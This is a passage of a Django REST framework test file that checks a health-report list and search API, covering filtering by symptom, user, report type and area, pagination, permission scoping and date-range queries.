def test_api_report_filter_multiple_data_with_authority(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.yoona.auth_token.key)
response = self.client.get(reverse('report-list'), {
'symptom': 'fever',
'createdBy': self.taeyeon.id,
'type': self.type1.id,
'administrationArea': self.area1.id,
})
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 1)
report1 = response_json['results'][0]
self.assertEqual(report1['id'], self.report2.id)
def test_api_report_filter_results_only_have_permission_on_report_type(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
response = self.client.get(reverse('report-list'), {
'type': self.type3.id,
})
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 0)
def test_api_report_filter_results_only_have_permission_on_report_type_with_authority(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.yoona.auth_token.key)
response = self.client.get(reverse('report-list'), {
'type': self.type3.id,
})
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 0)
def test_api_report_filter_results_only_have_permission_on_administration_area(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
response = self.client.get(reverse('report-list'), {
'administrationArea': self.area3.id,
})
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 0)
def test_api_report_filter_results_only_have_permission_on_administration_area_with_authority(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.yoona.auth_token.key)
response = self.client.get(reverse('report-list'), {
'administrationArea': self.area3.id,
})
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 0)
'''
def test_api_report_list_will_always_return_report_type_0(self):
factory.create_report(type=self.default_positive_type, administration_area=self.area1, negative=False)
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
response = self.client.get(reverse('report-list'))
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 4)
def test_api_report_list_will_always_return_report_type_0_with_authority(self):
factory.create_report(type=self.default_positive_type, administration_area=self.area1, negative=False)
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.yoona.auth_token.key)
response = self.client.get(reverse('report-list'))
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 4)
'''
def test_anonymous_cannot_access_api_list_reports(self):
response = self.client.get(reverse('report-list'))
self.assertEqual(response.status_code, 401)
@patch('django_redis.get_redis_connection', mock_strict_redis_client)
class TestApiReportSearch(APITestCase):
def setUp(self):
try:
ReportType.objects.get(id=0)
except ReportType.DoesNotExist:
ReportType.objects.create(
id=0,
name='Positive Report Type',
form_definition='{}',
version=0,
)
call_command('clear_index', interactive=False, verbosity=0)
self.taeyeon = factory.create_user()
self.taeyeon.last_name = 'Kim'
self.taeyeon.save()
self.jessica = factory.create_user()
self.jessica.last_name = 'Jung'
self.jessica.save()
self.yoona = factory.create_user()
self.yoona.last_name = 'Im'
self.yoona.save()
self.authority = factory.create_authority()
self.authority.users.add(self.taeyeon)
self.authority.users.add(self.yoona)
self.authority_1 = factory.create_authority()
self.authority_1.users.add(self.jessica)
self.type1 = factory.create_report_type(authority=self.authority)
self.type2 = factory.create_report_type(authority=self.authority)
self.type3 = factory.create_report_type(authority=self.authority_1)
self.area1 = factory.create_administration_area(authority=self.authority)
self.area2 = factory.create_administration_area(authority=self.authority)
self.area3 = factory.create_administration_area(authority=self.authority_1)
self.report1 = factory.create_report(created_by=self.taeyeon, type=self.type2,
administration_area=self.area2, form_data={
"symptom": u"cough,ปวดหัว,stiff",
"sickCount": 5,
}, date=datetime.datetime(2014, 11, 7, 12, 30, 45))
self.report2 = factory.create_report(created_by=self.taeyeon, type=self.type1,
administration_area=self.area1, date=datetime.datetime(2014, 11, 11, 12, 30, 45))
self.report3 = factory.create_report(created_by=self.jessica, type=self.type1,
administration_area=self.area2, date=datetime.datetime(2014, 11, 9, 13, 30, 45))
self.report4 = factory.create_report(type=self.type3, administration_area=self.area2)
self.report5 = factory.create_report(type=self.type1, administration_area=self.area3)
def test_api_report_search(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
response = self.client.get(reverse('reports_search'))
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 3)
report1 = response_json['results'][0]
self.assertEqual(report1['id'], self.report2.id)
self.assertEqual(report1['reportId'], self.report2.report_id)
self.assertEqual(report1['guid'], self.report2.guid)
self.assertEqual(report1['reportTypeId'], self.report2.type.id)
self.assertEqual(report1['administrationAreaId'], self.report2.administration_area.id)
self.assertEqual(report1['negative'], self.report2.negative)
self.assertEqual(report1['createdByName'], self.report2.created_by.get_full_name())
self.assertEqual(report1['date'], self.report2.date.strftime('%Y-%m-%dT%H:%M:%SZ'))
self.assertEqual(report1['incidentDate'], self.report2.incident_date.strftime('%Y-%m-%d'))
report2 = response_json['results'][1]
self.assertEqual(report2['id'], self.report3.id)
self.assertEqual(report2['reportId'], self.report3.report_id)
self.assertEqual(report2['guid'], self.report3.guid)
self.assertEqual(report2['reportTypeId'], self.report3.type.id)
self.assertEqual(report2['administrationAreaId'], self.report3.administration_area.id)
self.assertEqual(report2['negative'], self.report3.negative)
self.assertEqual(report2['createdByName'], self.report3.created_by.get_full_name())
self.assertEqual(report2['date'], self.report3.date.strftime('%Y-%m-%dT%H:%M:%SZ'))
self.assertEqual(report2['incidentDate'], self.report3.incident_date.strftime('%Y-%m-%d'))
report3 = response_json['results'][2]
self.assertEqual(report3['id'], self.report1.id)
self.assertEqual(report3['reportId'], self.report1.report_id)
self.assertEqual(report3['guid'], self.report1.guid)
self.assertEqual(report3['reportTypeId'], self.report1.type.id)
self.assertEqual(report3['administrationAreaId'], self.report1.administration_area.id)
self.assertEqual(report3['negative'], self.report1.negative)
self.assertEqual(report3['createdByName'], self.report1.created_by.get_full_name())
self.assertEqual(report3['date'], self.report1.date.strftime('%Y-%m-%dT%H:%M:%SZ'))
self.assertEqual(report3['incidentDate'], self.report1.incident_date.strftime('%Y-%m-%d'))
def test_api_report_search_with_authority(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.yoona.auth_token.key)
response = self.client.get(reverse('reports_search'))
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 3)
report1 = response_json['results'][0]
self.assertEqual(report1['id'], self.report2.id)
self.assertEqual(report1['reportId'], self.report2.report_id)
self.assertEqual(report1['guid'], self.report2.guid)
self.assertEqual(report1['reportTypeId'], self.report2.type.id)
self.assertEqual(report1['administrationAreaId'], self.report2.administration_area.id)
self.assertEqual(report1['negative'], self.report2.negative)
self.assertEqual(report1['createdByName'], self.report2.created_by.get_full_name())
self.assertEqual(report1['date'], self.report2.date.strftime('%Y-%m-%dT%H:%M:%SZ'))
self.assertEqual(report1['incidentDate'], self.report2.incident_date.strftime('%Y-%m-%d'))
report2 = response_json['results'][1]
self.assertEqual(report2['id'], self.report3.id)
self.assertEqual(report2['reportId'], self.report3.report_id)
self.assertEqual(report2['guid'], self.report3.guid)
self.assertEqual(report2['reportTypeId'], self.report3.type.id)
self.assertEqual(report2['administrationAreaId'], self.report3.administration_area.id)
self.assertEqual(report2['negative'], self.report3.negative)
self.assertEqual(report2['createdByName'], self.report3.created_by.get_full_name())
self.assertEqual(report2['date'], self.report3.date.strftime('%Y-%m-%dT%H:%M:%SZ'))
self.assertEqual(report2['incidentDate'], self.report3.incident_date.strftime('%Y-%m-%d'))
report3 = response_json['results'][2]
self.assertEqual(report3['id'], self.report1.id)
self.assertEqual(report3['reportId'], self.report1.report_id)
self.assertEqual(report3['guid'], self.report1.guid)
self.assertEqual(report3['reportTypeId'], self.report1.type.id)
self.assertEqual(report3['administrationAreaId'], self.report1.administration_area.id)
self.assertEqual(report3['negative'], self.report1.negative)
self.assertEqual(report3['createdByName'], self.report1.created_by.get_full_name())
self.assertEqual(report3['date'], self.report1.date.strftime('%Y-%m-%dT%H:%M:%SZ'))
self.assertEqual(report3['incidentDate'], self.report1.incident_date.strftime('%Y-%m-%d'))
def test_api_report_search_with_pagination(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
params = {
'page_size': 2
}
response = self.client.get(reverse('reports_search'), params)
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 3)
self.assertEqual(len(response_json['results']), 2)
params = {
'page_size': 2,
'page': 2
}
response = self.client.get(reverse('reports_search'), params)
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 3)
self.assertEqual(len(response_json['results']), 1)
def test_api_report_search_with_pagination_with_authority(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.yoona.auth_token.key)
params = {
'page_size': 2
}
response = self.client.get(reverse('reports_search'), params)
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 3)
self.assertEqual(len(response_json['results']), 2)
params = {
'page_size': 2,
'page': 2
}
response = self.client.get(reverse('reports_search'), params)
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 3)
self.assertEqual(len(response_json['results']), 1)
def test_api_report_search_filter_date_lt(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
params = {
'date__lt': '2014-11-11T12:30:45Z'
}
response = self.client.get(reverse('reports_search'), params)
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 2)
self.assertEqual(len(response_json['results']), 2)
report1 = response_json['results'][0]
self.assertEqual(report1['id'], self.report3.id)
report2 = response_json['results'][1]
self.assertEqual(report2['id'], self.report1.id)
def test_api_report_search_filter_date_lt_with_authority(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.yoona.auth_token.key)
params = {
'date__lt': '2014-11-11T12:30:45Z'
}
response = self.client.get(reverse('reports_search'), params)
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 2)
self.assertEqual(len(response_json['results']), 2)
report1 = response_json['results'][0]
self.assertEqual(report1['id'], self.report3.id)
report2 = response_json['results'][1]
self.assertEqual(report2['id'], self.report1.id)
def test_api_report_search_return_report_only_administration_area_in_group_role_reporter(self):
group_a = factory.add_user_to_new_group(user=self.taeyeon,
type=GROUP_WORKING_TYPE_ALERT_REPORT_ADMINSTRATION_AREA)
area = factory.create_administration_area()
factory.create_group_administration_area(group=group_a, administration_area=area)
report = factory.create_report(created_by=self.taeyeon, type=self.type1,
administration_area=area)
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
response = self.client.get(reverse('reports_search'))
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 3)
def test_api_report_search_return_report_only_report_type_in_group_role_reporter(self):
group_r = factory.add_user_to_new_group(user=self.taeyeon,
type=GROUP_WORKING_TYPE_ALERT_REPORT_REPORT_TYPE)
newtype = factory.create_report_type()
factory.create_group_report_type(group=group_r, report_type=newtype)
report = factory.create_report(created_by=self.taeyeon, type=newtype,
administration_area=self.area2)
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
response = self.client.get(reverse('reports_search'))
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 3)
def test_api_report_search_with_form_data(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
params = {
'withFormData': True
}
response = self.client.get(reverse('reports_search'), params)
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 3)
report1 = response_json['results'][0]
self.assertEqual(report1['id'], self.report2.id)
self.assertEqual(report1['formData'], json.loads(self.report2.form_data))
report2 = response_json['results'][1]
self.assertEqual(report2['id'], self.report3.id)
self.assertEqual(report2['formData'], json.loads(self.report3.form_data))
report3 = response_json['results'][2]
self.assertEqual(report3['id'], self.report1.id)
self.assertEqual(report3['formData'], json.loads(self.report1.form_data))
def test_api_report_search_with_form_data_with_authority(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.yoona.auth_token.key)
params = {
'withFormData': True
}
response = self.client.get(reverse('reports_search'), params)
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 3)
report1 = response_json['results'][0]
self.assertEqual(report1['id'], self.report2.id)
self.assertEqual(report1['formData'], json.loads(self.report2.form_data))
report2 = response_json['results'][1]
self.assertEqual(report2['id'], self.report3.id)
self.assertEqual(report2['formData'], json.loads(self.report3.form_data))
report3 = response_json['results'][2]
self.assertEqual(report3['id'], self.report1.id)
self.assertEqual(report3['formData'], json.loads(self.report1.form_data))
'''
def test_api_report_search_will_return_report_that_area_is_child_of_permitted_administration_area(self):
area = self.area1.add_child(name='Namsan', location=self.area1.location)
report = factory.create_report(type=self.type1, administration_area=area,
date=datetime.datetime(2014, 10, 9, 13, 30, 45))
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
response = self.client.get(reverse('reports_search'))
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 4)
report1 = response_json['results'][0]
self.assertEqual(report1['id'], self.report2.id)
report2 = response_json['results'][1]
self.assertEqual(report2['id'], self.report3.id)
report3 = response_json['results'][2]
self.assertEqual(report3['id'], self.report1.id)
report4 = response_json['results'][3]
self.assertEqual(report4['id'], report.id)
def test_api_report_search_will_return_report_that_area_is_child_of_permitted_administration_area_with_authority(self):
area = self.area1.add_child(name='Namsan', location=self.area1.location)
report = factory.create_report(type=self.type1, administration_area=area,
date=datetime.datetime(2014, 10, 9, 13, 30, 45))
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.yoona.auth_token.key)
response = self.client.get(reverse('reports_search'))
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 4)
report1 = response_json['results'][0]
self.assertEqual(report1['id'], self.report2.id)
report2 = response_json['results'][1]
self.assertEqual(report2['id'], self.report3.id)
report3 = response_json['results'][2]
self.assertEqual(report3['id'], self.report1.id)
report4 = response_json['results'][3]
self.assertEqual(report4['id'], report.id)
'''
def test_api_report_search_by_user(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
response = self.client.get(reverse('reports_search'), {
'q': 'createdBy:%s' % self.taeyeon.id
})
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 2)
report1 = response_json['results'][0]
self.assertEqual(report1['id'], self.report2.id)
report2 = response_json['results'][1]
self.assertEqual(report2['id'], self.report1.id)
def test_api_report_search_by_report_type(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
response = self.client.get(reverse('reports_search'), {
'q': 'type:%s' % self.type2.id
})
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 1)
report1 = response_json['results'][0]
self.assertEqual(report1['id'], self.report1.id)
def test_api_report_search_by_administration_area(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
response = self.client.get(reverse('reports_search'), {
'q': 'administrationArea:%s' % self.area1.id
})
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 1)
report1 = response_json['results'][0]
self.assertEqual(report1['id'], self.report2.id)
def test_api_report_search_by_form_data(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
response = self.client.get(reverse('reports_search'), {
'q': u'symptom:ปวดหัว',
})
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 1)
report1 = response_json['results'][0]
self.assertEqual(report1['id'], self.report1.id)
response = self.client.get(reverse('reports_search'), {
'q': 'symptom:fever',
})
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 2)
report1 = response_json['results'][0]
self.assertEqual(report1['id'], self.report2.id)
report2 = response_json['results'][1]
self.assertEqual(report2['id'], self.report3.id)
def test_api_report_search_by_form_data_with_authority(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.yoona.auth_token.key)
response = self.client.get(reverse('reports_search'), {
'q': u'symptom:ปวดหัว',
})
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 1)
report1 = response_json['results'][0]
self.assertEqual(report1['id'], self.report1.id)
response = self.client.get(reverse('reports_search'), {
'q': 'symptom:fever',
})
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 2)
report1 = response_json['results'][0]
self.assertEqual(report1['id'], self.report2.id)
report2 = response_json['results'][1]
self.assertEqual(report2['id'], self.report3.id)
def test_api_report_search_multiple_value_in_one_field(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
response = self.client.get(reverse('reports_search'), {
'q': u'symptom:ปวดหัว OR symptom:fever',
})
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 3)
report1 = response_json['results'][0]
self.assertEqual(report1['id'], self.report2.id)
report2 = response_json['results'][1]
self.assertEqual(report2['id'], self.report3.id)
report3 = response_json['results'][2]
self.assertEqual(report3['id'], self.report1.id)
def test_api_report_search_multiple_value_in_one_field_with_authority(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.yoona.auth_token.key)
response = self.client.get(reverse('reports_search'), {
'q': u'symptom:ปวดหัว OR symptom:fever',
})
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 3)
report1 = response_json['results'][0]
self.assertEqual(report1['id'], self.report2.id)
report2 = response_json['results'][1]
self.assertEqual(report2['id'], self.report3.id)
report3 = response_json['results'][2]
self.assertEqual(report3['id'], self.report1.id)
def test_api_report_search_greater_than_value(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
response = self.client.get(reverse('reports_search'), {
'q': 'sickCount:[5 TO *]',
})
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 1)
report1 = response_json['results'][0]
self.assertEqual(report1['id'], self.report1.id)
def test_api_report_search_greater_than_value_with_authority(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.yoona.auth_token.key)
response = self.client.get(reverse('reports_search'), {
'q': 'sickCount:[5 TO *]',
})
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 1)
report1 = response_json['results'][0]
self.assertEqual(report1['id'], self.report1.id)
def test_api_report_search_multiple_data(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
response = self.client.get(reverse('reports_search') + '?q=symptom:fever AND createdBy:%s AND type:%s AND administrationArea:%s' % (
self.taeyeon.id,
self.type1.id,
self.area1.id,
))
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 1)
report1 = response_json['results'][0]
self.assertEqual(report1['id'], self.report2.id)
def test_api_report_search_multiple_data_with_authority(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.yoona.auth_token.key)
response = self.client.get(reverse('reports_search') + '?q=symptom:fever AND createdBy:%s AND type:%s AND administrationArea:%s' % (
self.taeyeon.id,
self.type1.id,
self.area1.id,
))
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 1)
report1 = response_json['results'][0]
self.assertEqual(report1['id'], self.report2.id)
def test_api_report_search_results_only_have_permission_on_report_type(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
response = self.client.get(reverse('reports_search'), {
'q': 'type:%s' % self.type3.id
})
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 0)
def test_api_report_search_results_only_have_permission_on_report_type_with_authorit(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.yoona.auth_token.key)
response = self.client.get(reverse('reports_search'), {
'q': 'type:%s' % self.type3.id
})
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 0)
def test_api_report_search_results_only_have_permission_on_administration_area(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
response = self.client.get(reverse('reports_search'), {
'q': 'administrationArea:%s' % self.area3.id
})
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 0)
def test_api_report_search_results_only_have_permission_on_administration_area_with_authority(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.yoona.auth_token.key)
response = self.client.get(reverse('reports_search'), {
'q': 'administrationArea:%s' % self.area3.id
})
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 0)
def test_api_report_search_will_always_return_report_type_0(self):
default_positive_type = ReportType.objects.get(id=0)
factory.create_report(type=default_positive_type, administration_area=self.area1, negative=False)
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
response = self.client.get(reverse('reports_search'))
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 4)
'''
def test_api_report_search_will_always_return_report_type_0_with_authority(self):
try:
default_positive_type = ReportType.objects.get(id=0)
except ReportType.DoesNotExist:
default_positive_type = ReportType.objects.create(id=0, code='positive-report', name='positive report')
factory.create_report(type=default_positive_type, administration_area=self.area1, negative=False)
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.yoona.auth_token.key)
response = self.client.get(reverse('reports_search'))
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 4)
'''
def test_api_report_search_date_today(self):
today = datetime.date.today()
tomorrow = today + datetime.timedelta(days=1)
yesterday = today - datetime.timedelta(days=1)
report = factory.create_report(type=self.type1, administration_area=self.area1,
date=datetime.datetime.combine(today, datetime.time(0, 0)))
report2 = factory.create_report(type=self.type1, administration_area=self.area1,
date=datetime.datetime.combine(tomorrow, datetime.time(0, 0)))
report3 = factory.create_report(type=self.type1, administration_area=self.area1,
date=datetime.datetime.combine(yesterday, datetime.time(23, 59)))
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
response = self.client.get(reverse('reports_search') + '?q=date: today')
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 1)
report1 = response_json['results'][0]
self.assertEqual(report1['id'], report.id)
def test_api_report_search_date_today_with_authority(self):
today = datetime.date.today()
tomorrow = today + datetime.timedelta(days=1)
yesterday = today - datetime.timedelta(days=1)
report = factory.create_report(type=self.type1, administration_area=self.area1,
date=datetime.datetime.combine(today, datetime.time(0, 0)))
report2 = factory.create_report(type=self.type1, administration_area=self.area1,
date=datetime.datetime.combine(tomorrow, datetime.time(0, 0)))
report3 = factory.create_report(type=self.type1, administration_area=self.area1,
date=datetime.datetime.combine(yesterday, datetime.time(23, 59)))
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.yoona.auth_token.key)
response = self.client.get(reverse('reports_search') + '?q=date: today')
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 1)
report1 = response_json['results'][0]
self.assertEqual(report1['id'], report.id)
def test_api_report_search_date_yesterday(self):
yesterday = datetime.datetime.now() - datetime.timedelta(days=1)
report = factory.create_report(type=self.type1, administration_area=self.area1,
date=yesterday)
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
response = self.client.get(reverse('reports_search') + '?q=date: yesterday')
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 1)
report1 = response_json['results'][0]
self.assertEqual(report1['id'], report.id)
def test_api_report_search_date_yesterday_with_authority(self):
yesterday = datetime.datetime.now() - datetime.timedelta(days=1)
report = factory.create_report(type=self.type1, administration_area=self.area1,
date=yesterday)
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.yoona.auth_token.key)
response = self.client.get(reverse('reports_search') + '?q=date: yesterday')
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 1)
report1 = response_json['results'][0]
self.assertEqual(report1['id'], report.id)
def test_api_report_search_date_this_week(self):
report = factory.create_report(type=self.type1, administration_area=self.area1,
date=datetime.datetime.now())
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
response = self.client.get(reverse('reports_search') + '?q=date: this week')
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 1)
report1 = response_json['results'][0]
self.assertEqual(report1['id'], report.id)
def test_api_report_search_date_this_week_with_authority(self):
report = factory.create_report(type=self.type1, administration_area=self.area1,
date=datetime.datetime.now())
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.yoona.auth_token.key)
response = self.client.get(reverse('reports_search') + '?q=date: this week')
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 1)
report1 = response_json['results'][0]
self.assertEqual(report1['id'], report.id)
def test_api_report_search_last_7_days(self):
last7days = datetime.datetime.now() - datetime.timedelta(days=7)
report = factory.create_report(type=self.type1, administration_area=self.area1,
date=last7days)
last10days = datetime.datetime.now() - datetime.timedelta(days=10)
report10 = factory.create_report(type=self.type1, administration_area=self.area1,
date=last10days)
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
response = self.client.get(reverse('reports_search') + '?q=date: last 7 days')
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 1)
report1 = response_json['results'][0]
self.assertEqual(report1['id'], report.id)
def test_api_report_search_last_7_days_with_authority(self):
last7days = datetime.datetime.now() - datetime.timedelta(days=7)
report = factory.create_report(type=self.type1, administration_area=self.area1,
date=last7days)
last10days = datetime.datetime.now() - datetime.timedelta(days=10)
report10 = factory.create_report(type=self.type1, administration_area=self.area1,
date=last10days)
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.yoona.auth_token.key)
response = self.client.get(reverse('reports_search') + '?q=date: last 7 days')
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 1)
report1 = response_json['results'][0]
self.assertEqual(report1['id'], report.id)
def test_api_report_search_last_10_days(self):
last7days = datetime.datetime.now() - datetime.timedelta(days=7)
report = factory.create_report(type=self.type1, administration_area=self.area1,
date=last7days)
last10days = datetime.datetime.now() - datetime.timedelta(days=10)
report10 = factory.create_report(type=self.type1, administration_area=self.area1,
date=last10days)
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
response = self.client.get(reverse('reports_search') + '?q=date: last 10 days')
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 2)
report1 = response_json['results'][0]
self.assertEqual(report1['id'], report.id)
report2 = response_json['results'][1]
self.assertEqual(report2['id'], report10.id)
def test_api_report_search_last_10_days_with_authority(self):
last7days = datetime.datetime.now() - datetime.timedelta(days=7)
report = factory.create_report(type=self.type1, administration_area=self.area1,
date=last7days)
last10days = datetime.datetime.now() - datetime.timedelta(days=10)
report10 = factory.create_report(type=self.type1, administration_area=self.area1,
date=last10days)
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.yoona.auth_token.key)
response = self.client.get(reverse('reports_search') + '?q=date: last 10 days')
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 2)
report1 = response_json['results'][0]
self.assertEqual(report1['id'], report.id)
report2 = response_json['results'][1]
self.assertEqual(report2['id'], report10.id)
def test_api_report_search_date_today_timezone(self):
today = datetime.date.today()
yesterday = today - datetime.timedelta(days=1)
report_today = factory.create_report(type=self.type1, administration_area=self.area1,
date=datetime.datetime.combine(today, datetime.time(20, 0)))
report_yesterday = factory.create_report(type=self.type1, administration_area=self.area1,
date=datetime.datetime.combine(yesterday, datetime.time(20, 0)))
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
response = self.client.get(reverse('reports_search') + '?tz=7&q=date: today')
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 1)
report1 = response_json['results'][0]
self.assertEqual(report1['id'], report_yesterday.id)
def test_api_report_search_date_today_timezone_with_authority(self):
today = datetime.date.today()
yesterday = today - datetime.timedelta(days=1)
report_today = factory.create_report(type=self.type1, administration_area=self.area1,
date=datetime.datetime.combine(today, datetime.time(20, 0)))
report_yesterday = factory.create_report(type=self.type1, administration_area=self.area1,
date=datetime.datetime.combine(yesterday, datetime.time(20, 0)))
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.yoona.auth_token.key)
response = self.client.get(reverse('reports_search') + '?tz=7&q=date: today')
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 1)
report1 = response_json['results'][0]
self.assertEqual(report1['id'], report_yesterday.id)
def test_api_report_search_date_yesterday_timezone(self):
today = datetime.date.today()
yesterday = today - datetime.timedelta(days=1)
last_2_day = today - datetime.timedelta(days=2)
report_yesterday = factory.create_report(type=self.type1, administration_area=self.area1,
